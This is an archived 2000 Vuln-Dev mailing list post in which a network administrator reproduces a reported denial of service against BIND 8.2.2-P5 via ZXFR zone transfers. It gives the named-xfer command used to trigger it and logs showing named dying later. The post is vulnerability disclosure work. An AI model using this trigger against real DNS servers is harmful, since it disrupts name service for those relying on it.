Vulnerability Development mailing list archives
Re: Possible DOS in Bind 8.2.2-P5 (talked too soon...)
From: Fernando Cardoso <fernando () BN PT>
Date: Wed, 8 Nov 2000 14:10:40 -0000
20 minutes after trying the DoS, named died... No core dumped. (from /var/log/messages) Nov 8 11:11:07 dns2 named[309]: approved ZXFR from [x.x.x.1].1795 for "xxx.org" Nov 8 11:11:07 dns2 named[309]: unsupported XFR (type ZXFR) of "xxx.org" (IN) to [x.x.x.1].1795 Nov 8 11:32:40 dns2 named[309]: rm_datum: DB_F_ACTIVE not set Nov 8 11:32:40 dns2 named[309]: rm_datum: DB_F_ACTIVE not set Fernando _________________________________________________________ Fernando Cardoso Phone: +351 21 7982186 Network Administrator Fax: +351 21 7982185 National Library E-mail: fernando () bn pt Portugal PGP ID: 28551CB8
-----Original Message----- From: Fernando Cardoso Sent: quarta-feira, 8 de Novembro de 2000 10:26 To: VULN-DEV () SECURITYFOCUS COM Cc: 'naif () inet it' Subject: RE: Possible DOS in Bind 8.2.2-P5 Just tried on RedHat 6.0. No DoS... [root@dns1 /root]# named-xfer -z xxx.org -d 9 -f dump_dns -Z dns2 -l log.dns [root@dns1 /root]# cat log.dns.knvl2m domain `xxx.org'; file `dump_dns'; serial 0 zone found (2): "xxx.org", source = dump_dns Arg: "dns2" AXFR addrcnt = 1 getzone() xxx.org secondary address [x.x.x.2] AXFR connecting to server #1 [x.x.x.2].53 len = 154 ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 62154 ;; flags: qr aa ra; QUERY: 1, ANSWER: 1, AUTHORITY: 2, ADDITIONAL: 2 ;; xxx.org, type = SOA, class = IN xxx.org. 1D IN SOA dns1. me () somewhere pt. ( 200000000 ; serial 8H ; refresh 2H ; retry 1W ; expiry 1D ) ; minimum xxx.org. 1D IN NS dns1 xxx.org. 1D IN NS dns1 dns1 1D IN A x.x.x.1 dns2 1D IN A x.x.x.2 need update, serial 200000000 send ZXFR query to x.x.x.2 bufsize = 1024 close(5) succeeded error receiving zone transfer [root@dns2 fernando]# tail /var/log/messages Nov 8 11:07:56 dns2 named[309]: approved ZXFR from [x.x.x.1].1793 for "xxx.org" Nov 8 11:07:56 dns2 named[309]: unsupported XFR (type ZXFR) of "xxx.org" (IN) to [x.x.x.1].1793 Fernando _________________________________________________________ Fernando Cardoso Phone: +351 21 7982186 Network Administrator Fax: +351 21 7982185 National Library E-mail: fernando () bn pt Portugal PGP ID: 28551CB8Hi, playing with bind and ZXFR feature ( zone transfer compressed with a possible insecure execlp("gzip", "gzip", NULL); ), i discovered a Denial Of Service against Bind 8.2.2-P5 . By default Bind 8.2.2-P5 it's not compiled with ZXFR support unless you define it with #define BIND_ZXFR so it will refuse any ZXFR transfer, because it doesn't support it. But now what appens? Look here... [...]
Current thread:
- Re: Possible DOS in Bind 8.2.2-P5 (talked too soon...) Fernando Cardoso (Nov 09)